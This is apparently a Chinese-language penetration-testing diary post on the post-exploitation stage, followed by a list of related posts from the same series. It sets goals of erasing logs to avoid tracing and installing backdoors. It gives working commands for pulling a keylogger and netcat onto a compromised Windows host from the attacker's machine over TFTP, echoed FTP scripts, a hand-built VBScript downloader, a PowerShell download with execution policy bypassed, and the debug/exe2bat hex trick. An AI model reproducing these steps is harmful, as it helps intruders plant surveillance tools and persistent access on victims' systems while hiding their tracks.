小白日記20:kali滲透測試之後滲透測試階段(一)--上傳工具
後滲透測試階段--上傳工具
為防止管理員將漏洞補上後,我們無法再通過該漏洞控制對方主機,所以需要進行後滲透測試階段
1、上傳各種工具
2、提權:為了全面控制目標系統
3、擦除攻擊痕跡:防止管理員通過日誌溯源追蹤,發現攻擊源頭【除了系統日記,應用程式也會有自己的日誌資訊】
##刪除系統日記和應用程式日記
例如:SLmail中
4、安裝後門程式
實現長期控制,Dump密碼,作為跳板進行內網滲透【大部分情況下,比公網滲透簡單】
注:後滲透利用階段
最大的挑戰:防病毒軟體【根據病毒特徵庫進行查殺】。所以我們需要使用合法的遠端控制軟體(NC)【儘量做到免殺,但也有可能在防病毒軟體更新特徵庫後,被檢測出來】
上傳工具
目的:持久控制,擴大對目標系統的控制能力
Linux系統
linux系統下實現上傳工具比較容易,因為其預設安裝netcat、curl、wget,即使沒有安裝netcat,也可以輕易地使用curl和wget去黑客共享的伺服器下載安裝木馬、netcat等【curl和wget一定會在linux系統下預設安裝】
Windows系統
相對來說,windows系統下缺少預裝工具,難以進行木馬等工具的下載
getshell後,windows系統下載木門工具例項
上傳工具姿勢根據小白日記17,getshell【此為類NC遠端控制shell,是一種非互動型的shell(即該命令列視窗下必須輸入完整的命令,無法tab鍵補全)】
在windows系統下安裝ftp軟體,體驗非互動型shell的壞處,添加/刪除元件中【appwiz.cpl】【需插入光碟】
因此我們必須上傳一些能提供互動型的木馬程式【灰鴿子等】
思路:【將要實現的命令寫到目標伺服器的文字檔案中,用ftp讀取文字檔案的命令進行下載】1、使用TFTP傳輸檔案【構造一個TFTP伺服器,在伺服器中放置工具木馬等,再通過被控端連線下載】
XP、2003中預設安裝,Win7、2008以後的系統需要單獨新增,但經常被邊界防火牆過濾。主流為FTP,是因為基於UDP協議,明文傳輸,不支援身份驗證
利用kali
mkdir /tftp #建立tftp目錄
chown -R nobody 設定許可權所有者為nobody【無本地登入許可權】
cp /usr/share/windows-binaries/whoami.exe /tftp/ #windows下檢視當前使用者
cp /usr/share/windows-binaries/klogger.exe /tftp/ #拷貝鍵盤記錄器
atftpd --daemon --port 69 /tftp/ #daemon,用後臺方式啟動,主目錄指向tftp
由於許可權問題,會出現以下這個常見問題【啟動程序不是tftp】
需kill 543這個程序,使用chown -R nobody /tftp/ 【將所有者改成nobody】
重啟服務
進到shell視窗,檢視tftp
進行tftp檔案傳輸
tasklist #檢視程序
鍵盤記錄器會記錄管理員的輸入,再同目錄下會生成記錄鍵盤輸入的文字檔案
type klogger
2、使用FTP傳輸
先在kali上apt-get install pure-ftpd
使用指令碼配置【切記:設定的密碼,下面echo會用到】
驗證ftp#!/bin/bash groupadd ftpgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pw useradd yuanfh -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth/ ln -s ../conf/PureDB 60pdb mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/ #建立的ftp主目錄 /etc/init.d/pure-ftpd restart
因為非互動系統中,ftp傳輸,在password命令處無法顯示,所以需要通過轉換思路進行下載
##先將whoami,klogger等程式拷貝到ftphome目錄【cp /tftp/* /ftphome/】C:\>echo open 192.168.1.127 21>ftp.txt echo open 192.168.1.127 21>ftp.txt C:\>echo yuanfh>>ftp.txt echo yuanfh>>ftp.txt C:\>echo password>>ftp.txt echo password>>ftp.txt C:\>echo bin>>ftp.txt echo bin>>ftp.txt C:\>echo GET whoami.exe >> ftp.txt echo GET whoami.exe >> ftp.txt C:\>echo GET klogger.exe >> ftp.txt echo GET klogger.exe >> ftp.txt C:\>echo bye >> ftp.txt echo bye >> ftp.txt
ftp -s:ftp.txt
3、使用VBSCRIRT傳輸檔案
#VBS是windows系統上預設的解釋型指令碼語言,在win7後增加了perl
##通過web程式,http協議下載遠端控制程式,需在kali啟動apache2
[email protected]:~# service apache2 start [email protected]:~# netstat -pantu | grep :80 tcp6 0 0 :::80 :::* LISTEN 4433/apache2
進入apache2預設目錄,拷貝檔案
貼上以下命令到shell視窗[email protected]:~# cd /var/www/html [email protected]:/var/www/html# cp /ftphome/* . [email protected]:/var/www/html# ls index.html klogger.exe whoami.exe [email protected]:/var/www/html#
cscript wget.vbs http://192.168.1.127/whoami.exe w.exeecho strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXSEITTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXSEITTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXSEITTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXSEITTING_PROXY = 2 >> wget.vbs echo Dim http, varByteArray, strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Noting Then Set http = CreateObjiect("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Noting Then Set http = CreateObjiect("WinHttp.MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Noting Then Set http = CreateObjiect("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Noting >> wget.vbs echo Set fs = CreateObject("Scrippting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Miidb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs
【windows系統自帶的cscipt命令去下載whoami.exe 命名成w.exe,傳輸完成後,需重啟一下目標系統】
4、使用POWERSHELL傳輸檔案 【到目標伺服器下載程式】
##需在windows系統下執行
$strongeDir = $pwd $webclient = New-Object System.Net.WebClient $url = "http://192.168.1.127/whoami.exe" $file = "new-exsploit.exe" $webclient DownloadFile($url,$file)
powershell.exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -Noprofile -File wget.ps15、使用DEBUG傳輸檔案
Debug是一種彙編、反彙編的16進位制dump工具,作為檔案傳輸,預設情況下只能傳輸64k位元組的資料
一、使用upx壓縮檔案進行壓縮再進行傳輸
cp /usr/share/windows-binaries/nc.exe . #拷貝nc到根目錄
二、將exe程式轉化成16進位制文字格式[email protected]:~# upx -9 nc.exe #-9:最高程度壓縮 Ultimate Packer for eXecutables Copyright (C) 1996 - 2013 UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013 File size Ratio Format Name -------------------- ------ ----------- ----------- 59392 -> 29184 49.14% win32/pe nc.exe Packed 1 file.
wine /usr/share/windows-binaries/exe2bat.exe nc.exe nc.txt
將文字檔案中的16進位制程式碼(除倒數兩行外)全部複製到shell視窗中debug<123.hex #生成1.dll
copy 1.dlll nc.exe
相關推薦
小白日記20:kali滲透測試之後滲透測試階段(一)--上傳工具
後滲透測試階段--上傳工具 為防止管理員將漏洞補上後,我們無法再通過該漏洞控制對方主機,所以需要進行後滲透測試階段 1、上傳各種工具 2、提權:為了全面控制目標系統 3、擦除攻擊痕跡:防止管理員通過
小白日記36:kali滲透測試之Web滲透-手動漏洞挖掘(二)-突破身份認證,作業系統任意命令執行漏洞
手動漏洞挖掘 ###################################################################################### 手動漏洞挖掘
小白日記10:kali滲透測試之埠掃描-UDP、TCP、殭屍掃描、隱蔽掃描
埠掃描 二三四層發現的目的只是為了準確發現所有活著主機IP,確定攻擊面,埠掃描即發現攻擊點,發現開放埠。埠對應網路服務及應用端程式,服務端程式的漏洞通過埠攻入。【所有的掃描結果,都不要完全相信】 一
小白日記30:kali滲透測試之Web滲透-掃描工具-Skipfish
WEB滲透-skipfish Skipfish是一個命令列模式,以C語言編寫的積極的Web應用程式的安全性偵察工具,沒有代理模式。 它準備了一個互動為目標的網站的站點地圖進行一個遞迴爬網和基於字典的探
小白日記11:kali滲透測試之服務掃描-banner、dmitry、nmap特徵庫、作業系統識別、SNMP
<strong>[email protected]:~# xprobe2 192.168.1.115 </strong> Xprobe2 v.0.3 Copyright (c) 2002-2005 [email protected], [email pro
小白日記29:kali滲透測試之Web滲透-掃描工具-Vega
WEB掃描工具-Vega 純圖形化介面,Java編寫的開源web掃描器。兩種工作模式:掃描模式和代理模式【主流掃描功能】。用於爬站。處理表單,注入測試等。支援SSL:http://vega/ca.c
小白日記12:kali滲透測試之服務掃描(二)-SMB掃描
SMB掃描 Server Message Block 協議。與其他標準的TCP/IP協議不同,SMB協議是一種複雜的協議,因為隨著Windows計算機的開發,越來越多的功能被加入到協議中去了,很難區分哪些概念和功能應該屬於Windows作業系統本身,哪些概念應該屬於SMB
小白日記18:kali滲透測試之緩衝區溢位例項(二)--Linux,穿越火線1.9.0
Linux系統下穿越火線-緩衝區溢位 原理:crossfire 1.9.0 版本接受入站 socket 連線時存在緩衝區溢位漏洞。 工具: 除錯工具:edb; ###python在漏洞溢位方面的滲透
小白日記8:kali滲透測試之主動資訊收集(二)三層發現:ping、traceroute、scapy、nmap、fping、Hping
三層發現 三層協議有:IP以及ICMP協議(internet管理協議).icmp的作用是用來實現intenet管理的,進行路徑的發現,網路通訊情況,或者目標主機的狀態;在三層發現中主要使用icmp協
《Web安全攻防:滲透測試實戰指南》筆記(一)
前言 這個系列是拜讀《Web安全攻防:滲透測試實戰指南》之後的一些筆記和實踐記錄,感謝作者對我學習過程的幫助,這本書值得大家入手學習。 資訊收集 1.獲取真實IP 繞過CDN尋找目標伺服器的真實IP,如果目標伺服器不存在CDN,可以通過www.i
基礎測試理論與實踐-連載(一):寫的背景與動機
注:本文是原創,轉載麻煩務必註明出處。 我第一次接觸測試的概念,是我大三的一次技術通識課上。 我的學校是一所國家級重點大學,在廣東省更是辦學的佼佼者。雖然我的專業,電腦科學與技術不是S學校的強項,但是我們班有很多同學在校期間就拿了ACM的世界金牌。在這種大牛大神的崇尚學習
OSGi是什麽:Java語言的動態模塊系統(一)
平臺 使用 數據 osgi servle http cto 優點 重啟 OSGi是什麽 OSGi亦稱做Java語言的動態模塊系統,它為模塊化應用的開發定義了一個基礎架構。OSGi容器已有多家開源實現,比如Knoflerfish、Equinox和Apache的Felix。您可
快速入門web接口自動化測試---知識與思想準備階段(一)
重要 請求 協議 工具 簡單 目標 多說 tro font 剛換了工作,老板要求我搞接口自動化,可是之前完全沒有搞過,怎麽辦?怎麽辦?答:先把B裝下了,然後學!個人感覺,這是在工作提升自己的最好方式,嘻嘻,鄙人在這裏以日記的形式,記錄自己作為一個技術渣,點點滴滴
《selenium2 python 自動化測試實戰》(13)——上傳文件
dml 實戰 文件的 -c pbm erl sel png flow 看代碼: # coding: utf-8 from selenium import webdriver from time import sleep driver = webdriver.Fir
MySQL系列:基於binlog的增量訂閱與消費(一)
clas 需要 val tro ali cat tor rip 變化 在一些業務場景中,像在數據分析中我們有時候需要捕獲數據變化(CDC);在數據審計中,我們也往往需要知道數據從這個點到另一個點的變化;同樣在實時分析中,我們有時候需要看到某個值得實時變化等。 要解決以上
💒 es6 + canvas 開源 蓋樓小遊戲 完整代碼註釋 從零教你做遊戲(一)
lock 基於 時間 git cor 默認 掃描 lin tga 蓋樓遊戲 一個基於 Canvas 的蓋樓遊戲 Demo 預覽 在線預覽地址 (Demo Link) 手機設備可以掃描下方二維碼 github https://github.com/bmqb/to
ROS:使用Qt Creator創建GUI程序(一)
編譯錯誤 repl 搜索 AC test ica all Go 5.2.1 開發環境: Ubuntu14.04 ROS indigo version Qt Creator 3.0.1 based on Qt 5.2.1 步驟如下:(按照下面命令一步步來,親測可行) (一)安
微信小程序(15)--上傳圖片公用組件(2)
ide png target 所有 sin cti mon cat out 接下來開始寫寫上傳圖片的公用組件,可以自定義上傳幾張圖片。 chooseImage文件夾裏面的index.wxml和index.js,涉及圖片上傳,刪除,預覽。 <view class="
MyEclipse教程:使用UML建立模組庫——第二部分(一)
MyEclipse 線上訂購年終抄底促銷!火爆開搶>> 【MyEclipse最新版下載】 UML2建模檔案儲存在建模儲存庫中,建模可用於生成Java程式碼,或者可以從程式碼生成模型。 本教程介紹如何執行與建模儲存庫相關的任務。 您將學到如何: 建立UML模型儲存庫
ueditor單圖片(simpleupload)上傳,設置其 width:100%,height:auto。以適應各種屏幕大小顯示
適應 () 技術 width png 屏幕大小 bsp 代碼 操作 打開ueditor.all.js,按下圖操作(修改後註意清緩存): 附上待搜索的關鍵字:function callback() 附上代碼 loader.setAttribute(‘width‘